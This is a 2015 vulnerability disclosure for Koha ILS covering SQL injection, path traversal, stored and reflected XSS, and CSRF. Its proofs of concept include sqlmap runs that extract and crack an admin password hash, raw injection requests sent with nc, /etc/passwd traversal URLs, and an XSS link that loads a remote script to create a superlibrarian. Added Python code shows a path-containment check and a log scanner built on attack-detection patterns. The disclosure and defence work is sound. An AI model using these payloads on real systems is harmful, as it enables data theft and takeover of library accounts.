
Koha ILS 3.20.x CSRF / XSS / Traversal / SQL Injection

Posted Jun 26, 2015
Authored by Raschin Tavakoli

Koha ILS suffers from cross site request forgery, cross site scripting, remote SQL injection, and path traversal vulnerabilities. Versions 3.20.x less than or equal to 3.20.1, 3.18.x less than or equal to 3.18.8, and 3.16.x less than or equal to 3.16.12 are affected.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
advisories | CVE-2015-4631, CVE-2015-4632, CVE-2015-4633
SHA-256 | db2ddcd34b4c592559253b1b3c6f3e7e83b307e30c13455c3c11e7c181ea9384

===============================================================================================
SBA Research Vulnerability Disclosure 
===============================================================================================

title: Koha Unauthenticated SQL injection
product:         Koha ILS
affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
fixed version: 3.20.1, 3.17.8, 3.16.12
CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631
impact: critical
website:         http://www.koha-community.org/

found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group
contact:         cst@sba-research.org


References: http://koha-community.org/security-release-koha-3-20-1/
        http://koha-community.org/security-release-koha-3-18-8/
        http://koha-community.org/security-release-koha-3-16-12/

        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423

===============================================================================================

==========================
1. Multiple SQL Injections
==========================

+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)   +
+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +

Vulnerability:
--------------
The URL parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQL injection.

Impact:
-------
By injecting malicious SQL code, a remote attacker can access the database and read arbitrary data. If the webserver is misconfigured, the file system may be accessed as well.

References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412


# ################################################################################################## #
# PoC:     #
# ################################################################################################## #
1. Inspect Koha database schema

   Have a look at how to query the database for superlibrarian users:
   http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

   So basically we need to execute an SQL statement like this:
   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;

2. Query the database with sqlmap

   So let's fire up sqlmap with the --sql-shell parameter and input the query:

   root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4
         _
    ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}
   |_ -| . | |     | .'| . |
   |___|_  |_|_|_|_|__,|  _|
         |_|           |_|   http://sqlmap.org


   [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


   [*] starting at 09:20:07


   [09:20:07] [INFO] testing connection to the target URL
   sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
   ---
   Parameter: number (GET)
       Type: AND/OR time-based blind
       Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
       Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
   ---
   [09:20:09] [INFO] testing MySQL
   [09:20:09] [INFO] confirming MySQL
   [09:20:09] [INFO] the back-end DBMS is MySQL
   web server operating system: Linux Debian
   web application technology: Apache 2.4.10
   back-end DBMS: MySQL >= 5.0.0
   [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER


   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
   [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
   [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
   [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                      
   [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
   admin
   [09:21:46] [INFO] retrieved: $2a$08$taQ
   [09:23:33] [ERROR] invalid character detected. retrying..
   [09:23:33] [WARNING] increasing time delay to 5 seconds 
   afOgEEhU
   [09:25:10] [ERROR] invalid character detected. retrying..
   [09:25:10] [WARNING] increasing time delay to 6 seconds 
   t/gW
   [09:26:13] [ERROR] invalid character detected. retrying..
   [09:26:13] [WARNING] increasing time delay to 7 seconds 
   TOmqnYe1Y6ZNxCENa
   [09:29:57] [ERROR] invalid character detected. retrying..
   [09:29:57] [WARNING] increasing time delay to 8 seconds 
   2.ONk2eZhnuEw5z9OjjxS
   [09:35:08] [ERROR] invalid character detected. retrying..
   [09:35:08] [WARNING] increasing time delay to 9 seconds 

   select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:    
   'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'

3. Feed john the ripper and be lucky

   root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
   root@kali:/home/wicked# john ./admin-pass 
   Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
   admin            (?)
   guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate
   Use the "--show" option to display all of the cracked passwords reliably

   root@kali:/home/wicked# john ./admin-pass --show
   ?:admin

   1 password hash cracked, 0 left

4. Log in with username "admin" and password "admin" ;)

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #

+ +++++++++++++++++++++++++++++++++++ +
+ b) SQL Injection in STAFF interface +
+ +++++++++++++++++++++++++++++++++++ +

Vulnerability:
--------------
An SQL injection vulnerability in /cgi-bin/koha/reports/borrowers_out.pl allows remote attackers to read arbitrary data from the database due to improper input validation of the parameters Filter and Criteria.

Impact:
-------
By injecting malicious SQL, a remote attacker can read arbitrary data from the database. If the webserver is misconfigured, read and write access to the filesystem may be possible.

References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426

# ################################################################################################## #
# PoC:     #
# ################################################################################################## #

====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002


echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002

====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002

====================================================================

You will notice different output in every second request, demonstrating the evaluation of the payload.

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #

=================================
3. Path Traversal (CVE-2015-4633)
=================================

Vulnerability
-------------
The "template_path" parameter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to path traversal.

Impact
------
A remote attacker may read arbitrary files on the system.

References
----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408


# ################################################################################################## #
# PoC:     #
# ################################################################################################## #

The following input is used to print out /etc/passwd:

/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #
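A server-side containment check for the "template_path" value, added here as an illustration (it is not Koha's code or the project's actual fix). TEMPLATE_ROOT and the sample template name are hypothetical; the rejected value is the one from the PoC above after URL decoding.

```python
import os
from urllib.parse import unquote

# Hypothetical template directory; substitute the real one for your install.
TEMPLATE_ROOT = "/srv/example/koha-tmpl"


def resolve_template(template_path, root=TEMPLATE_ROOT):
    """Map an already URL-decoded template_path to a file under root.

    Raises ValueError when the resolved path would leave root.
    """
    if not template_path or "\x00" in template_path:
        raise ValueError("empty or NUL-containing template_path")
    root_real = os.path.realpath(root)
    # realpath collapses '..' segments and follows symlinks, so the check
    # below is made on the file that would actually be opened. An absolute
    # template_path makes join() discard root, which the check also catches.
    candidate = os.path.realpath(os.path.join(root_real, template_path))
    inside = os.path.commonpath([root_real, candidate]) == root_real
    if candidate == root_real or not inside:
        raise ValueError("template_path escapes the template root")
    return candidate


def is_allowed(template_path, root=TEMPLATE_ROOT):
    """Boolean wrapper around resolve_template for use in request handlers."""
    try:
        resolve_template(template_path, root)
        return True
    except ValueError:
        return False


# The value from the advisory's PoC, as the application sees it after the
# web server has URL-decoded the query string once.
ADVISORY_VALUE = unquote("..%2f" * 16 + "etc%2fpasswd")

if __name__ == "__main__":
    for value in (ADVISORY_VALUE, "/etc/passwd", "members/results.tt"):
        print(repr(value[:40]), "->", "allowed" if is_allowed(value) else "rejected")
```

The comparison is done on resolved paths rather than by searching the string for "..", so symlinks and absolute paths are handled by the same check.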

=================================
4. XSS and XSRF 
=================================

Vulnerability
-------------
Koha suffers from various critical XSS and XSRF vulnerabilities due to improper input validation. The site also lacks challenge tokens that would prevent cross-site request
forgery (XSRF) attacks.

The attack can be performed:

- through a compromised user account. User/password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)
- through a user clicking a malicious link (phishing mail, forum link etc.)

The following pages are affected by stored XSS flaws:

/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl

The following pages are affected by reflective XSS flaws:

/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl (parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl (parameters: "value") 
/cgi-bin/koha/acqui/lateorders.pl (parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl (parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") 
/cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode",
"suggesteddate_from", "suggesteddate_to")

Impact
----------
The vulnerabilities allow remote attackers to inject arbitrary web script or HTML in order to:

- escalate privileges by targeting staff members with XSRF 
- target users via browser exploits
- target the webserver by combining with other server-side vulnerabilities. 

References
----------------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

# ################################################################################################## #
# PoC / Attack Scenario:     #
# ################################################################################################## #

Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:

--> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens 

--> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl

the malicious code gets executed. The code can then perform any unauthorized actions with the permissions of user Bob. For example:

Create new user:
-----------------------

--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1

Give the new user superlibrarian permission:
--------------------------------------------

--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

The attacker can now log in as superlibrarian.

Side Note: For the attack to work, Alice needs to be logged in to the Open Public Catalog interface at the time of clicking the malicious link.
Alice needs to have access to the OPAC interface and to have permissions to create public lists.

# ################################################################################################## #
# PoC / Attack Scenario End     #
# ################################################################################################## #
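For defenders reviewing web server logs from an unpatched install, the following added example (not part of the original advisory) flags GET requests matching three issues described above: a non-numeric 'number' on opac-tags_subject.pl, a "template_path" that climbs out of its directory, and markup in the 'addshelf' list name. The log lines are constructed samples in Apache access-log format; the rule names are made up for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL_ENDPOINTS = ("/svc/members/search", "/svc/virtualshelves/search")


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252f) before inspecting a value."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(log_line):
    """Return the sorted rule names that one access-log line triggers."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    params = parse_qs(url.query)  # decodes each value once
    hits = set()
    if url.path.endswith("/opac-tags_subject.pl"):
        # The parameter is a count, so anything but digits is suspicious.
        if any(not re.fullmatch(r"\d+", v) for v in params.get("number", [])):
            hits.add("sqli-number")
    if url.path.endswith(TRAVERSAL_ENDPOINTS):
        for v in params.get("template_path", []):
            v = fully_decode(v).replace("\\", "/")
            if v.startswith("/") or ".." in v.split("/"):
                hits.add("traversal-template_path")
    if url.path.endswith("/opac-shelves.pl"):
        if any(re.search(r"[<>]", fully_decode(v)) for v in params.get("addshelf", [])):
            hits.add("xss-addshelf")
    return sorted(hits)


def scan(lines):
    """Return (line_index, rules) for every line that triggers a rule."""
    return [(i, hits) for i, line in enumerate(lines) if (hits := classify(line))]


# Constructed sample log lines (documentation IP ranges, invented sizes).
P = '198.51.100.7 - - [25/Jun/2015:09:20:07 +0200] "GET /cgi-bin/koha/'
SAMPLE_LOG = [
    P + 'opac-tags_subject.pl?number=10 HTTP/1.1" 200 5120',
    P + 'opac-tags_subject.pl?number=1%20PROCEDURE%20ANALYSE(1) HTTP/1.1" 200 5120',
    P + 'svc/members/search?template_path=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1843',
    P + 'svc/virtualshelves/search?template_path=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1843',
    P + 'opac-shelves.pl?shelves=1&addshelf=x+%3Cscript+src%3D%27http%3A%2F%2Fexample.invalid%2Fx.js%27%2F%3E HTTP/1.1" 200 900',
    P + 'opac-shelves.pl?shelves=1&addshelf=Summer+reading HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for index, rules in scan(SAMPLE_LOG):
        print(index, rules)
```

The borrowers_out.pl injection is sent in a POST body, which a standard access log does not record, so it is outside what this scan can see.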






